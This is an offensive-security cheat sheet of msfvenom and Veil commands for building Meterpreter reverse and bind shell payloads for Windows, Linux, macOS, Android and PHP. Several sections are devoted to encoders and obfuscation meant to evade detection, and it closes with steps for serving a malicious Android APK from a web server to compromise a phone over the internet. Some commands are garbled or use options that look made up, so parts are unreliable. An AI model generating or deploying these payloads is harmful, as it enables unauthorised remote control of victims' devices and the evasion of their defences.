MSFVENOM Quick Reference


More Cheatsheets


1. Basics

# List all encoders
msfvenom --list encoders

# List all payloads
msfvenom --list payloads

# Encoded Meterpreter reverse TCP payload for Windows 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe  encodedevil.exe

# Meterpreter reverse TCP payload for Linux 
msfvenom -p linux/×86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf  reverse.elf
Catching the shell
# Start Win Meterpreter Listener
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
run


- credit netmux

2. Target OS

MSFVENOM Payloads

# Windows Reverse TCP Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe -o reverse_meterpreter.exe

# Linux Reverse TCP Meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f elf -o reverse_meterpreter.elf

# macOS Reverse TCP Meterpreter
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o reverse_shell.macho

# Android Reverse TCP Meterpreter
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -o reverse_meterpreter.apk

# PHP Reverse TCP Meterpreter
msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o reverse_shell.php

# Generate a Windows x86 reverse shell payload in the Powershell format
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f powershell -o reverse_shell.ps1

# Generate a Linux x86 bind shell payload in the Python format
msfvenom -p linux/x86/shell/bind_tcp LPORT=<attacker port> -f python -o bind_shell.py

# Generate a macOS x86 reverse TCP Meterpreter payload that connects through an HTTP proxy
msfvenom -p osx/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o reverse_meterpreter.macho HTTP_PROXY=http://proxy.example.com:8080

# Generate a Windows x64 reverse HTTPS Meterpreter payload that encrypts communications with RC4
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=<attacker port> -f exe -o reverse_meterpreter.exe ENCODING=rc4

3. With Veil Framerwork

# Veil Framework 'apt install veil'

PYTHON

# Generate a custom payload with a specific name and set of evasion techniques
python Veil.py -p python/meterpreter/rev_http -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -H 5'

# Generate a payload with a custom shellcode encoder
python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-x alpha_mixed'

# Generate a payload with custom obfuscation options
python Veil.py -p python/meterpreter/reverse_tcp -o my_payload -t python -c '-t PS -Obfuscate true -ObfuscationType 3 -OutDirectory /root/veil/payloads/obfuscated'

WIN CMD

# Generate a payload with an encrypted communication channel
python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -C <attacker IP>:<attacker port>'

#Generate a windows payload with a custom shellcode encoder
python.exe Veil.py -p windows/meterpreter/reverse_tcp -o my_payload -t exe -c "-e x86/shikata_ga_nai -o raw -H 5"

# Generate a windows payload with custom obfuscation options
python.exe Veil.py -p windows/meterpreter/reverse_tcp -o my_payload -t exe -c "-x alpha_mixed"

# Generate a windows payload with an encrypted communication channel
python.exe Veil.py -p windows/meterpreter/reverse_tcp -o my_payload -t exe -c "-e x86/shikata_ga_nai -o raw -C <attacker IP>:<attacker port>"

4. Staged & Non-Staged by OS

# Windows x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe -o encodedevil.exe`

# Windows x86 Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 --platform windows -f exe --smallest -o encodedevil.exe`

# Windows x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p wgindows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f exe -o encodedevil.exe`

# Windows x64 Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f exe -o encodedevil.exe`

# Linux x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf -o reverse.elf`

# Linux x86 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -f elf --smallest -o reverse.elf`

# Linux x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf -o reverse.elf`

# Linux x64 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -f elf --smallest -o reverse.elf`

5. Obfuscated and encoded

# Windows x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/call4_dword_xor -i 3 -f exe -o encodedevil.exe`

# Windows x86 Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -a x86 --platform windows -f exe --smallest -o encodedevil.exe`

# Windows x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_dynamic -i 3 -f exe -o encodedevil.exe`

# Windows x64 Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_dynamic -i 3 -f exe -o encodedevil.exe`

# Linux x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/call4_dword_xor -i 3 -f elf -o reverse.elf`

# Linux x86 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x86/shikata_ga_nai -i 5 -f elf --smallest -o reverse.elf`

# Linux x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_context -i 3 -f elf -o reverse.elf`

# Linux x64 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x64/xor_context -i 3 -f elf --smallest -o reverse.elf`

6. Other possible evasion detection payloads

# Windows x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/alpha_mixed -i 5 -f exe -o encodedevil.exe`

# Windows x86 Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/alpha_upper -i 3 -a x86 --platform windows -f exe --smallest -o encodedevil.exe`

# Windows x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/zutto_dekiru -i 3 -f exe -o encodedevil.exe`

# Windows x64 Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/zutto_dekiru -i 3 -f exe -o encodedevil.exe`

# Linux x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/alpha_mixed -i 5 -f elf -o reverse.elf`

# Linux x86 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x86/alpha_upper -i 3 -f elf --smallest -o reverse.elf`

# Linux x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_context -i 3 -f elf -o reverse.elf`

# Linux x64 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x64/xor_context -i 3 -f elf --smallest -o reverse.elf`

Example : Generating a Payload with msfvenom

At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be 192.xxx.x.xxx. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.

After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device.

Type command:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk**

Where:
-p indicates a payload type android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device LHOST is your local IP LPORT is set to be as a listening port R> /var/www/html would give the output directly on apache server apk is the final name of the final outpu This would take some time to generate an apk file of almost ten thousand bytes.